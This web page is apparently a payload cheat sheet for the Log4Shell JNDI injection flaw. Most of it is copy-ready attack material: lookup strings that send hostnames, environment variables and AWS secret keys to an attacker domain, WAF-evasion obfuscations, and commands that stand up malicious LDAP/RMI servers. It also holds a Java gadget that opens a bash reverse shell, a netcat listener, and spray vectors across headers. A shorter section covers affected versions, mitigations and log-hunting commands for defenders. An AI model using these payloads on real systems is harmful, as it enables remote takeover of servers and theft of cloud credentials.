Log4Shell / JNDI Injection Cheat Sheet

Log4Shell (CVE-2021-44228) and JNDI injection payloads: detection strings, lookup nesting for WAF bypass, LDAP/RMI/DNS callback setups, marshalsec + exploit servers, and affected version reference. (48 payloads)

Try it interactively with the Callback Catcher Helper

Detection Payloads

(8)

${jndi:ldap://${hostName}.x.attacker.oast.fun/a}

Canonical detection probe — exfiltrates the victim hostname in the DNS callback so you know which target firedInject into any logged field

${jndi:dns://attacker.oast.fun/x}

DNS-only probe — fires even when egress LDAP/RMI is blocked but outbound DNS resolution still worksBlind detection

${jndi:ldap://attacker.oast.fun/a}

Plain LDAP lookup — the original PoC string; triggers an outbound LDAP connection on vulnerable Log4jBaseline test

X-Api-Version: ${jndi:ldap://${hostName}.hdr.attacker.oast.fun/a}

Header injection — spray across User-Agent, X-Forwarded-For, Referer, Authorization; apps log headers constantlyHTTP headers

${jndi:rmi://attacker.oast.fun:1099/a}

RMI variant — useful when LDAP is filtered; pre-8u121 / 6u132 / 7u122 JVMs trust remote RMI codebasesRMI fallback

${jndi:ldaps://attacker.oast.fun/a}

LDAPS over TLS — slips past plaintext-LDAP egress filters and IDS rules keyed on cleartext port 389Encrypted callback

username=${jndi:ldap://${env:USER}.${sys:java.version}.attacker.oast.fun/a}

Data-exfil probe — leak environment vars / Java version into the DNS label even without achieving RCELookup-based exfiltration

${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.oast.fun}

Cloud credential theft — many vulnerable hosts on AWS leak IAM keys/region purely via the DNS lookupCloud env exfiltration

WAF Bypass / Obfuscation

(8)

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.oast.fun/a}

Per-character default-value substitution — ${::-x} resolves to literal x, defeating naive 'jndi' string matchingMost common bypass

${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:l}${lower:d}a${lower:p}://attacker.oast.fun/a}

lower/upper lookups rebuild the keyword from transformed characters that no signature catchesCase-lookup obfuscation

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attacker.oast.fun/a}

env-lookup default values — undefined env var falls back to the literal, smuggling protocol/colon charsenv/sys/date default fallback

${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://attacker.oast.fun/a}

date-lookup quoting — literal characters inside date patterns reassemble jndi past keyword filtersdate-pattern smuggling

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker.oast.fun/a}

Obfuscate only the protocol — keeps 'jndi' visible but hides 'ldap' for WAFs that block protocol namesProtocol-only obfuscation

${jndi:ldap://127.0.0.1#attacker.oast.fun/a}

URL-fragment SSRF-style bypass — the '#' makes naive allowlist parsers see 127.0.0.1 as the hostAuthority confusion

${jndi:ldap://attacker%2eoast%2efun/a}

Percent-encoded dots — some inline WAFs decode after inspection, so encoded separators slip throughEncoding evasion

${j${k8s:k5:-ndi}:ldap://attacker.oast.fun/a}

Unknown-lookup default trick — any unrecognized lookup name with :-default still yields its fallback textArbitrary lookup name

Callback / Exploit Server Setup

(8)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ATTACKER:8888/#Exploit" 1389

Stand up a malicious LDAP referral server with marshalsec that redirects to your HTTP-hosted Exploit classmarshalsec LDAP server

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://ATTACKER:8888/#Exploit" 1099

RMI reference server — pair with ${jndi:rmi://...} for JVMs that still honour remote RMI codebasesmarshalsec RMI server

javac Exploit.java -source 8 -target 8 ; python3 -m http.server 8888

Compile the gadget against Java 8 bytecode and serve Exploit.class over HTTP for the referral to fetchHost the class

public class Exploit { static { try { Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ATTACKER/4444 0>&1"}); } catch(Exception e){} } }

Exploit.class with the payload in a static initializer — runs the moment the victim deserializes/loads itRCE gadget

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ATTACKER -p 8080

All-in-one JNDIExploit — bundles LDAP+RMI+HTTP and serves base64-command paths like /Basic/Command/Base64/...One-shot toolkit

java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtaQ==}|{base64,-d}|{bash,-i}" --hostname ATTACKER

rogue-jndi serves modern Tomcat/Groovy/EL bypass gadgets that work even when trustURLCodebase is falsePost-mitigation gadgets

nc -lvnp 4444

Catch the reverse shell triggered by the loaded gadget class on your listener portReverse-shell catcher

interactsh-client -v # or use a Collaborator / webhook.site URL as the JNDI host

Out-of-band canary to confirm the lookup fired before investing in a full LDAP referral chainOOB confirmation

Injection Points / Spray Vectors

(8)

User-Agent: ${jndi:ldap://ua.attacker.oast.fun/a}

User-Agent is logged by nearly every web stack and proxy — the single highest-yield vectorPer-subdomain tagging lets you fingerprint the firing field

X-Forwarded-For: ${jndi:ldap://xff.attacker.oast.fun/a}

XFF / X-Real-IP / X-Forwarded-Host are parsed by load balancers and access logs upstream of the appProxy/LB layer

Authorization: Basic ${jndi:ldap://authz.attacker.oast.fun/a}

Failed-auth handlers frequently log the raw Authorization header valueAuth header

POST /login username=${jndi:ldap://login.attacker.oast.fun/a}&password=x

GET /?q=${jndi:ldap://param.attacker.oast.fun/a}

Query/path params hit request loggers; URL-encode the $ { } if the framework rejects themURL parameter

Subject: ${jndi:ldap://smtp.attacker.oast.fun/a}

SMTP subjects, IRC/XMPP messages, MQTT topics, and Minecraft chat all flow into Log4j sinksNon-HTTP protocols

TLS SNI / client-cert CN: ${jndi:ldap://sni.attacker.oast.fun/a}

Reverse proxies that log the SNI hostname or certificate CN can be hit before any HTTP parsingTLS layer

X-Druid-Comment / hidden API fields: ${jndi:ldap://api.attacker.oast.fun/a}

JSON body keys and obscure vendor headers that get echoed into structured logs — blast every fieldCarpet-bomb the request

Affected Versions & Mitigations

(8)

CVE-2021-44228 — Log4j 2.0-beta9 through 2.14.1 (the original Log4Shell, CVSS 10.0)

Default-config RCE via message-lookup JNDI; fixed in 2.15.0Critical / RCE

CVE-2021-45046 — 2.15.0 incomplete fix

2.15.0 still allowed Thread Context Map lookups + DoS; some non-default configs reached RCE. Fixed in 2.16.0Patch bypass

CVE-2021-45105 — 2.0-alpha1 through 2.16.0

Uncontrolled self-referential recursion in lookups → DoS. Fixed in 2.17.0DoS

CVE-2021-44832 — through 2.17.0

RCE via a JDBC Appender pointing at an attacker-controlled JNDI source — requires config write access. Fixed in 2.17.1Config-dependent RCE

Patched lines: 2.3.2 (Java 6), 2.12.4 (Java 7), 2.17.1 (Java 8+)

Backported fixes for legacy JVM trains — verify the exact build, not just the 2.x branchFixed versions

Not vulnerable to JNDI RCE: Log4j 1.x (EOL, but check CVE-2021-4104 JMSAppender), Logback, java.util.logging

Log4j 1.x lacks message lookups; 2.x is the affected family — but 1.x has its own JMSAppender JNDI issue in non-default configsScope clarification

-Dlog4j2.formatMsgNoLookups=true / LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Stopgap for 2.10-2.14.1 only — removed/incomplete in earlier and superseded builds; patching is the real fixMitigation flag

-Dcom.sun.jndi.ldap.object.trustURLCodebase=false (default since 8u191/11.0.1)

Blocks remote-codebase class loading, defeating the classic gadget — but local-classpath gadgets (Tomcat BeanFactory, Groovy) still achieve RCEJVM hardening

Post-Exploitation & Verification

(8)

${jndi:ldap://ATTACKER/Basic/Command/Base64/aWQ=} (JNDIExploit path)

Run a single base64-encoded OS command via JNDIExploit's built-in command handler — fast RCE confirmationQuick command exec

${jndi:ldap://ATTACKER/Basic/ReverseShell/ATTACKER/4444}

JNDIExploit reverse-shell path — drops straight to a listener without writing a custom gadgetReverse shell

${jndi:ldap://ATTACKER/TomcatBypass/Command/Base64/...} or /GroovyBypass/...

Tomcat/Groovy local-gadget paths that bypass trustURLCodebase=false on patched JVMs with those libs on the classpathModern bypass gadget

find / -name 'log4j-core-*.jar' 2>/dev/null ; unzip -p log4j-core-*.jar META-INF/MANIFEST.MF | grep -i version

Locate Log4j JARs on disk and read the exact bundled version (incl. shaded/fat JARs) to confirm vulnerabilityVersion forensics on host

grep -rIE '\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nis|nds)' /var/log

Hunt JNDI strings across logs — includes the rarer iiop/corba/nis schemes attackers use to dodge ldap/rmi rulesLog triage / IR

grep -lr log4j ~/.m2 ; jdeps --list-deps app.jar ; mvn dependency:tree | grep log4j

Find transitive Log4j pulled in by frameworks (Spring Boot, Solr, Elasticsearch, Kafka, Struts) — often the real entry pointDependency hunting

logout4shell / log4j-vaccine: inject ${jndi:ldap://.../vaccine} to set formatMsgNoLookups in-place

Defensive in-the-wild technique — using the bug to patch the running JVM. Document if you observe it during IRSelf-patching artifact

Egress test: ${jndi:dns://INTERNAL-DNS/...} vs ${jndi:ldap://EXTERNAL/...}

Compare internal-DNS vs external-LDAP firing to map which egress paths are open — guides callback channel choiceEgress mapping

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Command Injection Cheat Sheet SSRF Cheat Sheet Insecure Deserialization Cheat Sheet LDAP Injection Cheat Sheet

Frequently asked questions

What is the Log4Shell / JNDI Injection Cheat Sheet?+

It's a quick-reference collection of 48 Log4Shell/JNDI payloads for testing Log4Shell / JNDI Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Log4Shell/JNDI payloads?+

Copy any payload straight into your authorized test, or use the Callback Catcher Helper to apply them interactively. Only test systems you have explicit permission to assess.

Are these Log4Shell/JNDI payloads free to use?+

Yes — this cheat sheet and all Log4Shell/JNDI payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Log4Shell / JNDI Injection Cheat Sheet?+

How do I use these Log4Shell/JNDI payloads?+

Copy any payload straight into your authorized test, or use the Callback Catcher Helper to apply them interactively. Only test systems you have explicit permission to assess.

Are these Log4Shell/JNDI payloads free to use?+

Yes — this cheat sheet and all Log4Shell/JNDI payloads are completely free, with no account required. Everything runs in your browser.

Log4Shell / JNDI Injection Cheat Sheet

Detection Payloads

WAF Bypass / Obfuscation

Callback / Exploit Server Setup

Injection Points / Spray Vectors

Affected Versions & Mitigations

Post-Exploitation & Verification

Related Tools

Related Cheat Sheets

Frequently asked questions

Log4Shell / JNDI Injection Cheat Sheet

Detection Payloads

WAF Bypass / Obfuscation

Callback / Exploit Server Setup

Injection Points / Spray Vectors

Affected Versions & Mitigations

Post-Exploitation & Verification

Related Tools

Related Cheat Sheets

Frequently asked questions